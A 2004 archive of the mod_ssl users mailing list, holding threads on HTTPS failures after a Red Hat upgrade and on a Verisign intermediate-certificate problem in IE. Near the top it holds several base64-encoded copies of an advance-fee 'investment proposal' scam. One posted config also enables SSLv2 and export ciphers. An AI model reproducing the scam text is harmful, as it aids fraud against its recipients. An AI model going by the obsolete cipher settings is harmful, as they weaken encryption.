YW5jaWFsIENvbnN1bHRhbnQsDQpGZWRlcmFsIFJlcHVibGljIE9mIE5pZ2VyaWEuIA0KDQpBVFRO
OiANCkkgaGF2ZSBpbnRlcmVzdCBvZiBpbnZlc3RpbmcgaW4geW91ciBjb3VudHJ5IGFzIHN1Y2gg
SQ0KZGVjaWRlZCB0byBlc3RhYmxpc2ggY29udGFjdCB3aXRoIHlvdSBmb3IgYXNzaXN0YW5jZQ0K
YXMgc29vbiBhcyBJIGFtIGFibGUgdG8gdHJhbnNmZXIgbXkgZnVuZHMgZm9yIHRoaXMNCmludmVz
dG1lbnQsIHdoaWNoIGlzIGFscmVhZHkgd2l0aCBhIHNlY3VyaXR5IGNvbXBhbnkNCmluIEV1cm9w
ZS4gDQpUaGVyZSBhcmUgdHdvIGJhc2ljIHRoaW5ncyBpIHdvdWxkIHdhbnQgeW91IHRvIGFzc2lz
dA0KbWUgaW47DQogDQooMSkgSGVscGluZyBhcyBhIGZyb250IGNvbGxlY3QgdGhlc2UgZnVuZHMg
ZnJvbSB0aGUNCnNlY3VyaXR5IGNvbXBhbnkgaW4gRXVyb3BlLlRoaXMgaXMgYmVjYXVzZSBvZiBt
eQ0KaW5hYmlsaXR5IHRvIHRyYXZlbCBvdXQgb2YgdGhlIGNvdW50cnkgd2hpY2ggaSBhbQ0KdGFr
aW5nIHJlZnVnZSBhdCB0aGUgbW9tZW50IHdpdGggbXkgd2lmZSBhbmQgY2hpbGRyZW4NCndoaWNo
IGkgd2lsbCBleHBsYWluIGJldHRlciB0byB5b3UgdXBvbiB0aGUgcmVjZWlwdCBvZg0KeW91ciBh
Y2NlcHRhbmNlLg0KIA0KKDIpSGVscGluZyBtZSB0byBjYXJyeSBvdXQgZmVhc2liaWxpdHkgc3R1
ZHkgb24NCmFyZWFzL2Nob2ljZSBvZiBpbnZlc3RtZW50IHlvdSBkZWVtIGJlc3QgZm9yIG1lLkkN
CnJldGlyZWQgYXMgZmluYW5jaWFsIGNvbnN1bHRhbnQgYW5kIHdhcyB0aGUgbGFzdA0KcGVyc29u
YWwgZmluYW5jaWFsIGFkdmlzZXIgdG8gdGhlIGV4LSBoZWFkIG9mIHN0YXRlDQpiZWZvcmUgaGlz
IGRlbWlzZSBhbmQgaGF2ZSBubyBpbnRlbnRpb24gb2YgY2FycnlpbmcNCm91dCBhbnkgZnVydGhl
ciBpbnZlc3RtZW50IHByb2dyYW1tZSBpbiBteSBjb3VudHJ5IGZvcg0Kc2VjdXJpdHkgcmVhc29u
cy4gDQoNClBsZWFzZSBpZiB5b3Ugd291bGQgYXNzaXN0IG1lLGRvIHJlcGx5IHRoaXMgbWFpbA0K
dGhyb3VnaCB0aGUgYWJvdmUgZW1haWwgb3IgbXkgcHJpdmF0ZSBlbWFpbCBhZGRyZXNzDQooamFt
ZXNfZHJAbXl3YXkuY29tKQ0KRW5jbG9zaW5nIHlvdXIgdGVsZXBob25lIGFuZCBmYXggbnVtYmVy
cy4NCiANClRoYW5rcywgDQoNCllvdXJzIHNpbmNlcmVseSwNCiANCkRyIEphbWVzIEFtYWRpDQoN
Cg==


From james33@moldova.cc  Wed May 19 13:53:20 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from moldova.cc (ftp.mdl.net [195.22.225.34])
	by master.modssl.org (Postfix) with ESMTP id 0BD92A893D
	for ; Wed, 19 May 2004 13:53:01 +0200 (CEST)
Received: (apparently) from moldova.cc ([195.22.225.39]) by moldova.cc  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Tue, 18 May 2004 18:51:57 +0300
Received: from [195.22.230.154:2678]  by 195.22.225.39  with MDL SMTP Proxy;
	ID {4FEA1AB2-53A5-4EF4-923E-7FDB2FDE9047};  18.05.2004 18:51:58.886 +0300
Message-ID: <32741-220045218155158921@moldova.cc>
X-Originating-IP: [192.116.135.53]
From: "james33" 
To: mhonarc-users@mhonarc.org
Subject: INVESTMENT PROPOSAL
Date: Tue, 18 May 2004 18:51:58 +0300
MIME-Version: 1.0
Content-Type: text/html; charset=windows-1251
Content-Transfer-Encoding: base64

DQpGcm9tIFRoZSBEZXNrIFRvcCBPZiBNciBKYW1lcyBBbWFkaSwNCk1EL0NFTyBPZiBUaGUgRmlu
YW5jaWFsIENvbnN1bHRhbnQsDQpGZWRlcmFsIFJlcHVibGljIE9mIE5pZ2VyaWEuIA0KDQpBVFRO
OiANCkkgaGF2ZSBpbnRlcmVzdCBvZiBpbnZlc3RpbmcgaW4geW91ciBjb3VudHJ5IGFzIHN1Y2gg
SQ0KZGVjaWRlZCB0byBlc3RhYmxpc2ggY29udGFjdCB3aXRoIHlvdSBmb3IgYXNzaXN0YW5jZQ0K
YXMgc29vbiBhcyBJIGFtIGFibGUgdG8gdHJhbnNmZXIgbXkgZnVuZHMgZm9yIHRoaXMNCmludmVz
dG1lbnQsIHdoaWNoIGlzIGFscmVhZHkgd2l0aCBhIHNlY3VyaXR5IGNvbXBhbnkNCmluIEV1cm9w
ZS4gDQpUaGVyZSBhcmUgdHdvIGJhc2ljIHRoaW5ncyBpIHdvdWxkIHdhbnQgeW91IHRvIGFzc2lz
dA0KbWUgaW47DQogDQooMSkgSGVscGluZyBhcyBhIGZyb250IGNvbGxlY3QgdGhlc2UgZnVuZHMg
ZnJvbSB0aGUNCnNlY3VyaXR5IGNvbXBhbnkgaW4gRXVyb3BlLlRoaXMgaXMgYmVjYXVzZSBvZiBt
eQ0KaW5hYmlsaXR5IHRvIHRyYXZlbCBvdXQgb2YgdGhlIGNvdW50cnkgd2hpY2ggaSBhbQ0KdGFr
aW5nIHJlZnVnZSBhdCB0aGUgbW9tZW50IHdpdGggbXkgd2lmZSBhbmQgY2hpbGRyZW4NCndoaWNo
IGkgd2lsbCBleHBsYWluIGJldHRlciB0byB5b3UgdXBvbiB0aGUgcmVjZWlwdCBvZg0KeW91ciBh
Y2NlcHRhbmNlLg0KIA0KKDIpSGVscGluZyBtZSB0byBjYXJyeSBvdXQgZmVhc2liaWxpdHkgc3R1
ZHkgb24NCmFyZWFzL2Nob2ljZSBvZiBpbnZlc3RtZW50IHlvdSBkZWVtIGJlc3QgZm9yIG1lLkkN
CnJldGlyZWQgYXMgZmluYW5jaWFsIGNvbnN1bHRhbnQgYW5kIHdhcyB0aGUgbGFzdA0KcGVyc29u
YWwgZmluYW5jaWFsIGFkdmlzZXIgdG8gdGhlIGV4LSBoZWFkIG9mIHN0YXRlDQpiZWZvcmUgaGlz
IGRlbWlzZSBhbmQgaGF2ZSBubyBpbnRlbnRpb24gb2YgY2FycnlpbmcNCm91dCBhbnkgZnVydGhl
ciBpbnZlc3RtZW50IHByb2dyYW1tZSBpbiBteSBjb3VudHJ5IGZvcg0Kc2VjdXJpdHkgcmVhc29u
cy4gDQoNClBsZWFzZSBpZiB5b3Ugd291bGQgYXNzaXN0IG1lLGRvIHJlcGx5IHRoaXMgbWFpbA0K
dGhyb3VnaCB0aGUgYWJvdmUgZW1haWwgb3IgbXkgcHJpdmF0ZSBlbWFpbCBhZGRyZXNzDQooamFt
ZXNfZHJAbXl3YXkuY29tKQ0KRW5jbG9zaW5nIHlvdXIgdGVsZXBob25lIGFuZCBmYXggbnVtYmVy
cy4NCiANClRoYW5rcywgDQoNCllvdXJzIHNpbmNlcmVseSwNCiANCkRyIEphbWVzIEFtYWRpDQoN
Cg==


From james33@moldova.cc  Wed May 19 14:48:44 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from moldova.cc (ftp.mdl.net [195.22.225.34])
	by master.modssl.org (Postfix) with ESMTP id 07294A8A65
	for ; Wed, 19 May 2004 14:48:27 +0200 (CEST)
Received: (apparently) from moldova.cc ([195.22.225.39]) by moldova.cc  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Tue, 18 May 2004 18:52:04 +0300
Received: from [195.22.230.154:2681]  by 195.22.225.39  with MDL SMTP Proxy;
	ID {C0C91084-FEBB-4D8E-AC81-A5D20D42F894};  18.05.2004 18:52:14.776 +0300
Message-ID: <125001-220045218155214812@moldova.cc>
X-Originating-IP: [200.71.61.6]
From: "james33" 
To: mhonarc-users@mhonarc.org
Subject: INVESTMENT PROPOSAL
Date: Tue, 18 May 2004 18:52:14 +0300
MIME-Version: 1.0
Content-Type: text/html; charset=windows-1251
Content-Transfer-Encoding: base64

DQpGcm9tIFRoZSBEZXNrIFRvcCBPZiBNciBKYW1lcyBBbWFkaSwNCk1EL0NFTyBPZiBUaGUgRmlu
YW5jaWFsIENvbnN1bHRhbnQsDQpGZWRlcmFsIFJlcHVibGljIE9mIE5pZ2VyaWEuIA0KDQpBVFRO
OiANCkkgaGF2ZSBpbnRlcmVzdCBvZiBpbnZlc3RpbmcgaW4geW91ciBjb3VudHJ5IGFzIHN1Y2gg
SQ0KZGVjaWRlZCB0byBlc3RhYmxpc2ggY29udGFjdCB3aXRoIHlvdSBmb3IgYXNzaXN0YW5jZQ0K
YXMgc29vbiBhcyBJIGFtIGFibGUgdG8gdHJhbnNmZXIgbXkgZnVuZHMgZm9yIHRoaXMNCmludmVz
dG1lbnQsIHdoaWNoIGlzIGFscmVhZHkgd2l0aCBhIHNlY3VyaXR5IGNvbXBhbnkNCmluIEV1cm9w
ZS4gDQpUaGVyZSBhcmUgdHdvIGJhc2ljIHRoaW5ncyBpIHdvdWxkIHdhbnQgeW91IHRvIGFzc2lz
dA0KbWUgaW47DQogDQooMSkgSGVscGluZyBhcyBhIGZyb250IGNvbGxlY3QgdGhlc2UgZnVuZHMg
ZnJvbSB0aGUNCnNlY3VyaXR5IGNvbXBhbnkgaW4gRXVyb3BlLlRoaXMgaXMgYmVjYXVzZSBvZiBt
eQ0KaW5hYmlsaXR5IHRvIHRyYXZlbCBvdXQgb2YgdGhlIGNvdW50cnkgd2hpY2ggaSBhbQ0KdGFr
aW5nIHJlZnVnZSBhdCB0aGUgbW9tZW50IHdpdGggbXkgd2lmZSBhbmQgY2hpbGRyZW4NCndoaWNo
IGkgd2lsbCBleHBsYWluIGJldHRlciB0byB5b3UgdXBvbiB0aGUgcmVjZWlwdCBvZg0KeW91ciBh
Y2NlcHRhbmNlLg0KIA0KKDIpSGVscGluZyBtZSB0byBjYXJyeSBvdXQgZmVhc2liaWxpdHkgc3R1
ZHkgb24NCmFyZWFzL2Nob2ljZSBvZiBpbnZlc3RtZW50IHlvdSBkZWVtIGJlc3QgZm9yIG1lLkkN
CnJldGlyZWQgYXMgZmluYW5jaWFsIGNvbnN1bHRhbnQgYW5kIHdhcyB0aGUgbGFzdA0KcGVyc29u
YWwgZmluYW5jaWFsIGFkdmlzZXIgdG8gdGhlIGV4LSBoZWFkIG9mIHN0YXRlDQpiZWZvcmUgaGlz
IGRlbWlzZSBhbmQgaGF2ZSBubyBpbnRlbnRpb24gb2YgY2FycnlpbmcNCm91dCBhbnkgZnVydGhl
ciBpbnZlc3RtZW50IHByb2dyYW1tZSBpbiBteSBjb3VudHJ5IGZvcg0Kc2VjdXJpdHkgcmVhc29u
cy4gDQoNClBsZWFzZSBpZiB5b3Ugd291bGQgYXNzaXN0IG1lLGRvIHJlcGx5IHRoaXMgbWFpbA0K
dGhyb3VnaCB0aGUgYWJvdmUgZW1haWwgb3IgbXkgcHJpdmF0ZSBlbWFpbCBhZGRyZXNzDQooamFt
ZXNfZHJAbXl3YXkuY29tKQ0KRW5jbG9zaW5nIHlvdXIgdGVsZXBob25lIGFuZCBmYXggbnVtYmVy
cy4NCiANClRoYW5rcywgDQoNCllvdXJzIHNpbmNlcmVseSwNCiANCkRyIEphbWVzIEFtYWRpDQoN
Cg==


From owner-modssl-users@modssl.org  Wed May 19 17:07:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2A750A89E6; Wed, 19 May 2004 17:07:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (mail.aeccom.com [213.61.120.228])
	by master.modssl.org (Postfix) with ESMTP id B56F5A8934
	for ; Wed, 19 May 2004 17:07:04 +0200 (CEST)
Received: from localhost (toro [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id CE6D46400F
	for ; Wed, 19 May 2004 17:06:52 +0200 (CEST)
Received: from mail2.aeccom.com (gate2.aeccom.com [212.202.101.158])
	by mail.aeccom.com (Postfix) with ESMTP id 4829264005
	for ; Wed, 19 May 2004 17:06:52 +0200 (CEST)
Received: from [192.168.2.14] (andes.core.aeccom.com [192.168.2.14])
	by mail2.aeccom.com (Postfix) with ESMTP id CE6263A
	for ; Wed, 19 May 2004 17:06:51 +0200 (CEST)
Subject: T-Online software 5.0
From: Sven Geisler 
To: modssl-users@modssl.org
Content-Type: text/plain
Organization: AEC/communications GmbH
Message-Id: <1084979211.26004.47.camel@andes.core.aeccom.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-7) 
Date: Wed, 19 May 2004 17:06:51 +0200
Content-Transfer-Encoding: 7bit
X-Virus-Scanned-By: AMaViS-ng 0.1.6.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I upgraded from RedHat 7.3 to RedHat Enterprise Linux 3.0 with
httpd-2.0.46-32.ent.rpm and mod_ssl-2.0.46-32.ent.rpm.
Users with T-Online software 5.0 can't use https since this update.
Http works fine for this users.
I used the standard rpm from RedHat 7.3 before.

The browser sting of the T-Online software:
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT)"

Did anyone have an idea?

Sven.

My ssl config:

SSLPassPhraseDialog     builtin
SSLSessionCache         shmcb:/var/cache/mod_ssl/scache(512000)
SSLSessionCacheTimeout  300
SSLMutex  file:logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLCipherSuite         
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
SSLCertificateFile      conf/ssl.crt/...
SSLCertificateKeyFile	conf/ssl.key/...
SetEnvIf User-Agent     ".*MSIE.*"      ssl-unclean-shutdown
SetEnvIf User-Agent     .*MSIE. 5.*"    ssl-unclean-shutdown nokeepalive
downgrade-1.0 force-response-1.0


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 19 17:26:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1B3F6A89E6; Wed, 19 May 2004 17:26:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id A0501A8933
	for ; Wed, 19 May 2004 17:25:52 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i4JFPhGG023288;
	Wed, 19 May 2004 11:25:43 -0400
Received: from localhost.localdomain (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i4JFPg013780;
	Wed, 19 May 2004 11:25:42 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.10/8.12.7) with ESMTP id i4JFPfm1024809;
	Wed, 19 May 2004 16:25:41 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i4JFPeMd024808;
	Wed, 19 May 2004 16:25:40 +0100
Date: Wed, 19 May 2004 16:25:40 +0100
From: Joe Orton 
To: Sven Geisler 
Cc: modssl-users@modssl.org
Subject: Re: T-Online software 5.0
Message-ID: <20040519152540.GA24778@redhat.com>
Mail-Followup-To: Sven Geisler ,
	modssl-users@modssl.org
References: <1084979211.26004.47.camel@andes.core.aeccom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <1084979211.26004.47.camel@andes.core.aeccom.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, May 19, 2004 at 05:06:51PM +0200, Sven Geisler wrote:
> Hi,
> 
> I upgraded from RedHat 7.3 to RedHat Enterprise Linux 3.0 with
> httpd-2.0.46-32.ent.rpm and mod_ssl-2.0.46-32.ent.rpm.
> Users with T-Online software 5.0 can't use https since this update.
> Http works fine for this users.
> I used the standard rpm from RedHat 7.3 before.

Try adding "LogLevel info" to the SSL vhost config: what errors do you
get in the ssl_error_log when such users connect?

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 19 17:49:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CBB6AA893D; Wed, 19 May 2004 17:49:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (mail.aeccom.com [213.61.120.228])
	by master.modssl.org (Postfix) with ESMTP id 98B8EA8934
	for ; Wed, 19 May 2004 17:48:53 +0200 (CEST)
Received: from localhost (toro [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id C06BD6400F
	for ; Wed, 19 May 2004 17:48:48 +0200 (CEST)
Received: from mail2.aeccom.com (gate2.aeccom.com [212.202.101.158])
	by mail.aeccom.com (Postfix) with ESMTP id 39D0264005
	for ; Wed, 19 May 2004 17:48:48 +0200 (CEST)
Received: from [192.168.2.14] (andes.core.aeccom.com [192.168.2.14])
	by mail2.aeccom.com (Postfix) with ESMTP
	id E400A3A; Wed, 19 May 2004 17:48:47 +0200 (CEST)
Subject: Re: T-Online software 5.0
From: Sven Geisler 
To: Joe Orton 
Cc: modssl-users@modssl.org
In-Reply-To: <20040519152540.GA24778@redhat.com>
References: <1084979211.26004.47.camel@andes.core.aeccom.com>
	 <20040519152540.GA24778@redhat.com>
Content-Type: text/plain
Organization: AEC/communications GmbH
Message-Id: <1084981727.26004.80.camel@andes.core.aeccom.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-7) 
Date: Wed, 19 May 2004 17:48:47 +0200
Content-Transfer-Encoding: 7bit
X-Virus-Scanned-By: AMaViS-ng 0.1.6.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Joe,

I have LogLevel warn in httpd.conf.

The error log hasn't any error for this users.

Thx
Sven.

Am Mi, den 19.05.2004 schrieb Joe Orton um 17:25:
> On Wed, May 19, 2004 at 05:06:51PM +0200, Sven Geisler wrote:
> > Hi,
> > 
> > I upgraded from RedHat 7.3 to RedHat Enterprise Linux 3.0 with
> > httpd-2.0.46-32.ent.rpm and mod_ssl-2.0.46-32.ent.rpm.
> > Users with T-Online software 5.0 can't use https since this update.
> > Http works fine for this users.
> > I used the standard rpm from RedHat 7.3 before.
> 
> Try adding "LogLevel info" to the SSL vhost config: what errors do you
> get in the ssl_error_log when such users connect?
> 
> joe
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 19 18:46:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 608BEA893D; Wed, 19 May 2004 18:46:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from zephyr.macallister.grass-valley.ca.us (014.181-60-66.DIA-subnet.surewest.net [66.60.181.14])
	by master.modssl.org (Postfix) with ESMTP id DE767A8933
	for ; Wed, 19 May 2004 18:46:40 +0200 (CEST)
Received: from [10.1.3.2]
 (adsl-63-204-65-11.dsl.scrm01.pacbell.net [63.204.65.11])
 by mail.macallister.grass-valley.ca.us (PMDF V6.2-X28 #35243)
 with ESMTPA id <01LA9VMV4T2E0003S9@mail.macallister.grass-valley.ca.us> for
 modssl-users@modssl.org; Wed, 19 May 2004 09:46:32 -0700 (PDT)
Date: Wed, 19 May 2004 09:46:32 -0700
From: Bill MacAllister 
Subject: Verisign CA cert problem
To: modssl-users@modssl.org
Message-id: <83B89A8EE5CB3BB658C6AF1D@wp.macallister.grass-valley.ca.us>
MIME-version: 1.0
X-Mailer: Mulberry/3.1.3 (Linux/x86)
Content-type: text/plain; format=flowed; charset=us-ascii
Content-transfer-encoding: 7bit
Content-disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bill MacAllister 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am having problems with a brand new Verisign 128 bit certificate that has 
just be purchased.  I have installed the certificate and the intermediate 
CA cert on an Apache 1.3.31/mod_ssl 2.8.17/openssl 0.9.7d instance.

What I am seeing is the Netscape and Mozilla connect to the site just fine. 
When I connect to the site with IE 6 the security window pops up telling be 
that the certificate has either expired or is not valid yet.  When I look 
at the certificate the intermediate CA cert that IE is using is the expired 
cert that was installed with IE.  I tried removing the old intermediate CA 
cert from IE altogether and it still will not load the intermediate CA cert 
from my server.

I am not really sure what to try at this point.   Oh, yes, Verisign support 
has been pretty much useless.

Help suggestions will be greatly appreciated.

Bill

+---------------------------------------------------
| Bill MacAllister
| 14219 Auburn Road
| Grass Valley, CA 95949
| 530-272-8555
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 19 19:18:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 61FA0A89E6; Wed, 19 May 2004 19:18:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id AC311A8934
	for ; Wed, 19 May 2004 19:18:07 +0200 (CEST)
Date: Wed, 19 May 2004 17:56:22 +0000
From: a.moon@mdx.ac.uk
Subject: Verisign CA cert problem
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.36
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on paternity leave for the next few days.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 19 19:51:10 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 22767A8934; Wed, 19 May 2004 19:51:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ronno.pricegrabber.com (ronno.pricegrabber.com [64.156.13.49])
	by master.modssl.org (Postfix) with ESMTP id 36198A8A79
	for ; Wed, 19 May 2004 19:50:53 +0200 (CEST)
Received: from [192.168.10.19] (wednesday.pricegrabber.com [192.168.10.19])
	(authenticated bits=0)
	by ronno.pricegrabber.com (8.12.10/8.12.11) with ESMTP id i4JHoihI006662
	for ; Wed, 19 May 2004 10:50:45 -0700
Subject: Re: Verisign CA cert problem
From: Christopher McCrory 
To: modssl-users@modssl.org
In-Reply-To: <83B89A8EE5CB3BB658C6AF1D@wp.macallister.grass-valley.ca.us>
References: <83B89A8EE5CB3BB658C6AF1D@wp.macallister.grass-valley.ca.us>
Content-Type: text/plain
Message-Id: <1084989044.14696.27.camel@wednesday.pricegrabber.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.6 (1.4.6-2) 
Date: Wed, 19 May 2004 10:50:44 -0700
Content-Transfer-Encoding: 7bit
X-RAVMilter-Version: 8.4.4(snapshot 20030410) (ronno)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher McCrory 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 2004-05-19 at 09:46, Bill MacAllister wrote:
> Hello,
> 
> I am having problems with a brand new Verisign 128 bit certificate that has 
> just be purchased.  I have installed the certificate and the intermediate 
> CA cert on an Apache 1.3.31/mod_ssl 2.8.17/openssl 0.9.7d instance.
> 

Did you get a new intermediate cert (intermediate.crt) from Verisign
also?  This also goes in the apache config. directions somewhere on
verisigns site.  


> What I am seeing is the Netscape and Mozilla connect to the site just fine. 
> When I connect to the site with IE 6 the security window pops up telling be 
> that the certificate has either expired or is not valid yet.  When I look 
> at the certificate the intermediate CA cert that IE is using is the expired 
> cert that was installed with IE.  I tried removing the old intermediate CA 
> cert from IE altogether and it still will not load the intermediate CA cert 
> from my server.
> 
> I am not really sure what to try at this point.   Oh, yes, Verisign support 
> has been pretty much useless.
> 
> Help suggestions will be greatly appreciated.
> 
> Bill
> 
> +---------------------------------------------------
> | Bill MacAllister
> | 14219 Auburn Road
> | Grass Valley, CA 95949
> | 530-272-8555
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Christopher McCrory
 "The guy that keeps the servers running"
 
chrismcc@pricegrabber.com
 http://www.pricegrabber.com
 
Let's face it, there's no Hollow Earth, no robots, and
no 'mute rays.' And even if there were, waxed paper is
no defense.  I tried it.  Only tinfoil works.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 19 20:36:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C8611A89E6; Wed, 19 May 2004 20:36:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from zephyr.macallister.grass-valley.ca.us (014.181-60-66.DIA-subnet.surewest.net [66.60.181.14])
	by master.modssl.org (Postfix) with ESMTP id 645C0A8934
	for ; Wed, 19 May 2004 20:36:31 +0200 (CEST)
Received: from [10.1.5.26]
 (010.181-60-66.DIA-subnet.surewest.net [66.60.181.10])
 by mail.macallister.grass-valley.ca.us (PMDF V6.2-X28 #35243)
 with ESMTPA id <01LA9ZH28H160003O6@mail.macallister.grass-valley.ca.us> for
 modssl-users@modssl.org; Wed, 19 May 2004 11:36:25 -0700 (PDT)
Date: Wed, 19 May 2004 11:36:01 -0700
From: Bill MacAllister 
Subject: Re: Verisign CA cert problem
In-reply-to: <1084989044.14696.27.camel@wednesday.pricegrabber.com>
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Mulberry/3.1.3 (Linux/x86)
Content-type: text/plain; format=flowed; charset=us-ascii
Content-transfer-encoding: 7bit
Content-disposition: inline
References: <83B89A8EE5CB3BB658C6AF1D@wp.macallister.grass-valley.ca.us>
 <1084989044.14696.27.camel@wednesday.pricegrabber.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bill MacAllister 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



--On Wednesday, May 19, 2004 10:50:44 AM -0700 Christopher McCrory 
 wrote:

> On Wed, 2004-05-19 at 09:46, Bill MacAllister wrote:
>> Hello,
>>
>> I am having problems with a brand new Verisign 128 bit certificate that
>> has  just be purchased.  I have installed the certificate and the
>> intermediate  CA cert on an Apache 1.3.31/mod_ssl 2.8.17/openssl 0.9.7d
>> instance.
>>
>
> Did you get a new intermediate cert (intermediate.crt) from Verisign
> also?  This also goes in the apache config. directions somewhere on
> verisigns site.

Yes.  The only certificate that has ever been on my servers is the new CA 
cert.

Actually there are multiple references on the Versign site:

 http://www.verisign.com/support/install/apache/v00Mod.html#global
 http://www.verisign.com/support/site/caReplacement.html

Of course, while both describe the same issue they suggest slightly 
different Apache directives.  Respectively the two suggestions are:

  SSLCertificateFile /etc/ssl/crt/public.crt
  SSLCertificateKeyFile /etc/ssl/crt/private.key
  SSLCertificateChainFile /etc/ssl/crt/intermediate.crt

and

  SSLCACertificateFile /etc/ssl/crt/intermediate.crt

I have tried both and neither method works for IE.

Bill

>
